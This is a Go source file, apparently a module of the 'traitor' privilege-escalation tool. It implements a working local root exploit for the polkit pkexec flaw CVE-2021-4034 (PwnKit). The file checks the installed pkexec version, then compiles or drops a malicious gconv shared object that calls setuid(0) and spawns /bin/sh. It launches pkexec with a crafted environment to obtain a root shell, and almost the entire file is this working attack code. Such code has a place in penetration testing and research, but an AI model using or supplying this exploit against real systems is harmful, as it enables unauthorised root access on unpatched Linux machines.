package cve20214034

import (
	"context"
	"fmt"
	"io/ioutil"
	"os"
	"os/exec"
	"path/filepath"
	"strconv"
	"strings"

	"github.com/google/uuid"
	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/state"
)

// see:
// - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
// - https://seclists.org/oss-sec/2022/q1/80
type cve20214034Exploit struct {
	uuid string
}

func New() *cve20214034Exploit {
	exp := &cve20214034Exploit{
		uuid: uuid.NewString(),
	}
	return exp
}

func (v *cve20214034Exploit) IsVulnerable(ctx context.Context, s *state.State, log logger.Logger) bool {

	if _, err := exec.LookPath("pkexec"); err != nil {
		return false
	}

	data, err := exec.Command("pkexec", "--version").Output()
	if err != nil {
		return false
	}

	bits := strings.Split(string(data), " ")
	last := bits[len(bits)-1]

	versionBits := strings.Split(last, ".")
	if versionBits[0] != "0" || len(versionBits) <= 1 {
		return false
	}
	minorStr := strings.Split(versionBits[1], "-")[0]
	minor, err := strconv.Atoi(minorStr)
	if err != nil {
		return false
	}
	if minor > 105 {
		return false
	}

	if err := v.Exploit(ctx, s, log.Silenced(), payloads.Payload("true")); err != nil {
		return false
	}

	log.Printf("Polkit version is vulnerable!")
	return true
}

func (v *cve20214034Exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Default)
}

func (v *cve20214034Exploit) writeSharedObject(path string, aggro bool, log logger.Logger) error {

	var command string
	var so []byte
	if aggro {
		so = pwnkit_sh_sharedobj
		command = "/bin/sh"
	} else {
		so = pwnkit_true_sharedobj
		command = "/usr/bin/true"
	}

	if _, err := exec.LookPath("cc"); err != nil {
		log.Printf("C compiler not available, using precompiled shared object...")
		return ioutil.WriteFile(path, so, 0755)
	}

	src := fmt.Sprintf(`#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void gconv(void) {}

void gconv_init(void *step) {
  char *const args[] = {"%s", NULL};
  char *const environ[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/"
                           "bin:/sbin:/bin:/opt/bin",
                           NULL};
  setuid(0);
  setgid(0);
  execve(args[0], args, environ);
  exit(0);
}
`, command)

	log.Printf("Compiling shared object...")
	srcPath := filepath.Join(os.TempDir(), "traitor.c")
	if err := ioutil.WriteFile(srcPath, []byte(src), 0600); err != nil {
		return err
	}
	defer func() {
		_ = os.Remove(srcPath)
	}()
	return exec.Command("cc", "-Wall", "-shared", "-fPIC", "-o", path, srcPath).Run()
}

func (v *cve20214034Exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {
	log.Printf("Setting up filesystem tree...")
	dir, err := os.MkdirTemp(os.TempDir(), "traitor")
	if err != nil {
		return fmt.Errorf("could not create temp dir: %s", err)
	}
	defer func() {
		_ = os.RemoveAll(dir)
	}()

	if err := os.MkdirAll(filepath.Join(dir, "GCONV_PATH=."), 0777); err != nil {
		return fmt.Errorf("cloud not create exploit dir: %s", err)
	}

	if err := ioutil.WriteFile(filepath.Join(dir, "GCONV_PATH=.", "hax.so:."), []byte(";)"), 0777); err != nil {
		return fmt.Errorf("failed to create fake executable: %s", err)
	}

	procAttr := &os.ProcAttr{
		Dir: dir,
		Env: []string{
			"hax.so:.",
			"PATH=GCONV_PATH=.",
			"SHELL=/no/where",
			"CHARSET=HAX",
			"GIO_USE_VFS=",
		},
		Files: []*os.File{
			os.Stdin,
			os.Stdout,
			os.Stderr,
		},
	}

	var aggressive bool
	switch payload {
	case payloads.Default, payloads.Defer:
		aggressive = true
	case payloads.Payload("true"):
	default:
		return fmt.Errorf("custom payloads are not supported for this exploit")
	}

	if err := v.writeSharedObject(filepath.Join(dir, "hax.so"), aggressive, log); err != nil {
		return err
	}

	log.Printf("Writing local gconv-modules...")
	if err := ioutil.WriteFile(filepath.Join(dir, "gconv-modules"), []byte("module UTF-8// HAX// hax 1\n"), 0644); err != nil {
		return fmt.Errorf("failed to write gconv-modules: %s", err)
	}

	pkexecPath, err := exec.LookPath("pkexec")
	if err != nil {
		return err
	}
	log.Printf("Starting %s with malicious environment variables set...", pkexecPath)
	process, err := os.StartProcess(pkexecPath, nil, procAttr)
	if err != nil {
		return err
	}
	_, err = process.Wait()
	return err
}
